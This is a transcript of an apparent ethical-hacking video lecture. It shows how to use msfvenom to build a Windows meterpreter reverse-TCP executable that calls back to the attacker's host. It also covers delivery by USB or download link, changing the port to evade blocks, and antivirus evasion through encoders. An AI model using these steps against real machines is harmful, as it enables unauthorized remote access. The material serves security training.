[00:00:00,150] Hello everybody and welcome back. Let us see some examples of actually crafting the payload for the Windows meterpreter shell. So, we were already introduced to the msfvenom tool, which allows us to create our own payloads, but we only did that in the PHP meterpreter attack, where we executed the meterpreter shell with the command injection and PHP code injection. But right now let's see how you can hack any Windows machine by delivering the payload over a USB drive, or basically just sending a link to someone for them to download. And when they execute it, they automatically connect back to you. So, this will be an attack that is based on every version of Windows, and as a target we will use my Windows 10 host machine. Now, Windows 10 is the newest Windows version, so you will see that it works even on the newest one, since it is a payload that gets executed by the target. So they have to open it in order for them to connect back to us.

[00:01:06,720] So, first of all, what we want to do is basically just type here msfvenom, and we will get a bunch of these options that we need to use in order to specify some of the things that our payload will have. So we were already introduced to some of them, such as LHOST, LPORT and -p for the payload. As we can see, these are options that we always specify, so what type of payload we want. After that we specify some of the payload options, such as the local host, which is the IP address of our Kali Linux machine, and the local port, which is the listening port on our Kali Linux machine. Now, the IP address is basically the output of ifconfig, and the local port can be any port you specify that isn't actually used. So, by default, as I said, Metasploit chooses the port 4444. So we will stick with that.

[00:02:04,380] So, let us actually just open up our msfconsole for a second to see what our available payloads are. Now, in order to craft the payload you need to know the name of the payload itself. So, the most used one is the windows/meterpreter/reverse_tcp, since it actually connects back to us over TCP and allows us to run our commands over the meterpreter shell. But that is not the only payload that is used for Windows. There are a bunch of others. We will just type here search windows payloads. So let me just... or we can just type here search payloads. And what we will do, let me just first zoom in on this so it looks a little bit prettier. We want to find... Windows, Windows, right. These are not payloads, search payloads. So let me see if I type here search payload, OK, payload. Okay, so here they are.

[00:03:15,390] Let me just zoom out once again, and we can see all of the payloads for all operating systems. So this is not only for Windows. This is basically also for Linux, or you can see here PHP as well. Let me just show you. There is the payload that we used in the previous videos. So php/meterpreter/reverse_tcp, so this is the payload that we are already familiar with. But what we want to do now is search payload/windows and then press enter, and so we only get the Windows payloads right here. Now, most of these you will most likely never use. As I said, the most important ones, and the ones that we will use right now, are these two. So, windows/x64/meterpreter_reverse_tcp. Now that is the meterpreter payload for the x64 or 64-bit Windows. And we also need the Windows meterpreter regular shell. So that is the, let me just find it... reverse TCP, here it is. So this is the regular one for the 32-bit Windows. Now, you will see that it does matter which one you use. But, basically, if you use a 32-bit one on a 64-bit machine it won't make such a problem, unless we are running our EternalBlue exploit, which I will show you later. But if you just run a simple payload as an executable the target executes, you can use both a 64-bit and a 32-bit one on a 64-bit machine. But you will not be able to run a 64-bit meterpreter shell on a 32-bit machine. So that is also useful to know. The one that we will use is this one. So let us just copy it, since that is the payload that we will use.

[00:05:13,170] And right now let us exit the msfconsole, and let me just zoom it in once again so you can see better. And let's type here msfvenom --help once again. We want to use this option. The next option that we can possibly use is the encoder. So we can encode our payload if we want to; basically, it is not necessary. It can actually bypass some anti-viruses, but most of the encoders are actually old ones, so they are already familiar. I mean, anti-viruses are already familiar with them. So it's not really that good to use them, but you can use them if you want to. So let me just cd to /usr/share/metasploit-framework/modules/encoders, cd x64... actually I want to go to cd x86, and we can choose any encoder we want. Now, the most important one is the shikata_ga_nai encoder, but that really basically doesn't do anything, since it is already well known by the antivirus companies.

[00:06:31,920] First of all, since my Windows 10 machine is actually a 64-bit machine, I will use a 64-bit one. So let's see what we have here. We will, for example, use this zutto_dekiru.rb, so we will use that. But, first of all, let me show you what it looks like when there is no encoder. So msfvenom -p for the payload, and we want to use windows/x64/meterpreter/reverse_tcp. So, if you just select this, it will basically make a simple payload, I believe, without specifying the LHOST and LPORT. Or it may actually show you an error that you didn't specify it. So we will specify it just in case. Let me just check out, oops... Let me just check out my IP address first, which is 192.168.1.4. So your IP address is the LHOST. So let us type here once again. So, msfvenom -p and then our payload, for which I will use windows/x64/meterpreter/reverse_tcp. Then we specify LHOST=192.168.1.4. Now that we did that, the next thing we want to specify is the LPORT. Now, as I said, by default Metasploit uses 4444. But, if you want to, you can change this, since some systems actually block this port, since it is a well-known Metasploit port. So it can be a bypass measure if you simply just change this port, though you do not really have to.

[00:08:16,830] We will stick with 4444 from now on. And what you want to type here is -f after that, and then exe, which stands for the exe file. Then we specify the arrow to the right, and then we name our shell, or reverse shell, or meterpreter shell, whatever you want to call it. We will name it reverse.exe. If we press enter right here, it will create a shell for us. Now, what you want to do, basically, we will upload this in the next video to VirusTotal, which is a website that is used to scan programs, or basically anti-viruses, in order to see how many anti-viruses detect this. Now, let us just read this. You can see the size of this. As we can see, the payload size is 510 bytes, and the final size of the exe file is 7000 bytes. So, if you just type here ls and you cat reverse.exe, basically, it will be some scrambled code. So, this is just how to create the simple payload for Windows. In the next lecture I'll show you how detectable this is. And it is, trust me, very detectable. Like 90% of antiviruses will catch this, since it is something that everyone that uses Kali Linux made at some point and used. And it is well known in the databases of anti-viruses.

[00:09:44,230] But we will see what actions we can take in order to make it less detectable, using, for example, encoders, or basically just editing the binary itself. But more about that in the next video. So I hope I see you there, and take care. Bye!